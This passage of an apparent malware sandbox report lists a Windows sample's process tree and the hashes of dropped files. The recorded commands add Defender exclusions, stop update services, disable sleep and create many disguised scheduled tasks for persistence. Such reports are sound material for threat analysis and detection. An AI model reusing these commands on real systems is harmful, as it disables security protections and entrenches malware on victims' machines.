                                                                                                                                        3⤵
                                                                                                                                          PID:2852
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                        2⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:4756
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          3⤵
                                                                                                                                            PID:4840
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                          2⤵
                                                                                                                                            PID:3784
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              3⤵
                                                                                                                                                PID:1624
                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                sc stop UsoSvc
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3708
                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                sc stop WaaSMedicSvc
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3436
                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                sc stop wuauserv
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:1452
                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                sc stop bits
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:1516
                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                sc stop dosvc
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:1996
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                              2⤵
                                                                                                                                              • Power Settings
                                                                                                                                              PID:3252
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                3⤵
                                                                                                                                                  PID:2864
                                                                                                                                                • C:\Windows\System32\powercfg.exe
                                                                                                                                                  powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                  3⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:4424
                                                                                                                                                • C:\Windows\System32\powercfg.exe
                                                                                                                                                  powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                  3⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:4960
                                                                                                                                                • C:\Windows\System32\powercfg.exe
                                                                                                                                                  powercfg /x -standby-timeout-ac 0
                                                                                                                                                  3⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:1088
                                                                                                                                                • C:\Windows\System32\powercfg.exe
                                                                                                                                                  powercfg /x -standby-timeout-dc 0
                                                                                                                                                  3⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:3032
                                                                                                                                              • C:\Windows\System32\dialer.exe
                                                                                                                                                C:\Windows\System32\dialer.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:2728
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                                  2⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:2880
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1112
                                                                                                                                                  • C:\Windows\System32\dialer.exe
                                                                                                                                                    C:\Windows\System32\dialer.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:244
                                                                                                                                                    • C:\Windows\System32\dialer.exe
                                                                                                                                                      C:\Windows\System32\dialer.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2140
                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /0
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:2068
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3536
                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3720
                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3876
                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3644
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:4888
                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5104
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4720
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2676
                                                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2236
                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3680
                                                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3888
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1148
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5012
                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4884
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3380
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4052
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3404
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3660
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2884
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1340
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Java\Registry.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:940
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Java\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3732
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4852
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2864
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4856
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4876
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:740
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1452
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1700
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 13 /tr "'C:\fontwin\MsServerHost.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1996
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1164
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 11 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2856
                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5820
                                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:232

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE956.tmp.csv

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4bfce38f0cf1ebb4512ce24a15922934

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  47254968ff47b9c3c4e286d7074a23bc3cbbcb66

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c1f0849cc5ec9e12eb75af1350b985c9e237251f8a66e1b5b088451bf858689a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  69830a1a09eed3b96d3fb7bf3898f57a3ba74701b807dba8a11c3b173d9a3d4bacd1dab58f9cbfa551f488d319037d08a7d542dae490baff52a8941a25042462

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE976.tmp.csv

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  0045722d631f04cc3f641d5faae0374b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2438dbca544f8e246f40fd07fc396515695d1aaf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e4701ed12cbb85b3e83429ef5ad56da6f1366dc82437189394d3c4585f5918ac

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  998b99456e43a902a603b83cb3eb78642e3d70e11a00ecd2652d4983e31c675bc095d32b90c14951850e784669ad857d4e3f5c759a2f9bb6e5dd39a906875e5d

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9A6.tmp.txt

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  13KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7594ca366cef74ed2d9e25898a8d4612

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  732cb6b948c67c1da1c8263adbfddc24952f6054

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  41197ec59f9cd7ae93d7f34888511649330f0f895039ed9e5b0bc28a52e1215a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bb638a4177607dbe4a6d5c68a522c3f4dcdc003a09ddb532f9cd5580d488b5e1e8c26867cbc41dd1cd5c2a468d7950f1b4fb6de76e95845317c82989324ae84d

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9A7.tmp.csv

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  15e3b78ce11c94f74873fa50121b4f63

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ac983dbe3492f6b8ae355e7233fe1f44040a9507

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4a91e93894623c8bf02b354641170a83d0a1685aa2c9a618c56bae54cce962db

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d7d24a1b0b792b5132700df61794ff8e4f1686ee23362032b36e7bf93aeb84143a7fa4d1162f9f9acac9c0ba701aa40e7e660e885fe5d600b145615cbfac8ed3

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9A8.tmp.txt

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  13KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  79565859437be9d1fcf7e496e10c325f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  faf914e926b45cc36ef12ea52a69375b32361a0d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  157bc1ae74b27e6a7356da6809f35d9deb58f3915841051b58c7f9b808322922

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  598df20f84ee4ca9876e214d63b47af718c319306300283708f99bad2d9fc62b9777eb62b0b878b39e4fd65069e6cd3a4e26f77c347c036bc5db3be5724d27b1

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9D8.tmp.txt

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  13KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e86cf0df7234e4752be4b145d03511a4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  54fadec800a35e48bee9836439c24cfb44474df0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f67be851a26eedf032e5abe3dbe075a8e10e2d0bbfca9a21fc6a3d7a37485c2c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0c06a492fc3c23bff0cd466af88655e2b3a44c8309dfad765898980f30daa8ef0fca3b9ca991219be35779c650c7a4fa49c67d89c483e06327fb672bf9074170

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d2fa367d9f7fae9ebddd3125b1b923ef

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  00841e939427be8eee67afe2bdb2a9c5423fb48e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ecd21c0d206e5b082bb6c4c798bd05e1614d905107def73ab1159f270fd4abba

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0876264a7b00d09567f89487d911c7ee2adaf923e604555d2b6c989524bbaed8ede119974e062c5ccde5ccfdb151d1ca1fe5742db8513c6f17becf12da351126

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  23909774a4f0358be8e03226d73fbd61

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4df262994ce4eb3935965881c1e2dc730668da94

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  6dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  6ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bd5940f08d0be56e65e5f2aaf47c538e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d7e31b87866e5e383ab5499da64aba50f03e8443

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a6c9d692ed2826ecb12c09356e69cc09

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  def728a6138cf083d8a7c61337f3c9dade41a37f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  59d97011e091004eaffb9816aa0b9abd

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  feadc4e1a70c13480ef147aca0c47bc0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d7a5084c93842a290b24dacec0cd3904c2266819

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  aaaac7c68d2b7997ed502c26fd9f65c2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7c5a3731300d672bf53c43e2f9e951c745f7fbdf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  28d4235aa2e6d782751f980ceb6e5021

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f5d82d56acd642b9fc4b963f684fd6b78f25a140

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8c66720f953e82cfbd8f00543c42c0cf77c3d97787ec09cb3e1e2ba5819bd638

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  dba1bd6600f5affcfdc33a59e7ac853ee5fdfafb8d1407a1768728bd4f66ef6b49437214716b7e33e3de91d7ce95709050a3dab4354dd62acaf1de28107017a2

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e8ce785f8ccc6d202d56fefc59764945

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ca032c62ddc5e0f26d84eff9895eb87f14e15960

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e448fe0d240184c6597a31d3be2ced58

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  372b8d8c19246d3e38cd3ba123cc0f56070f03cd

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

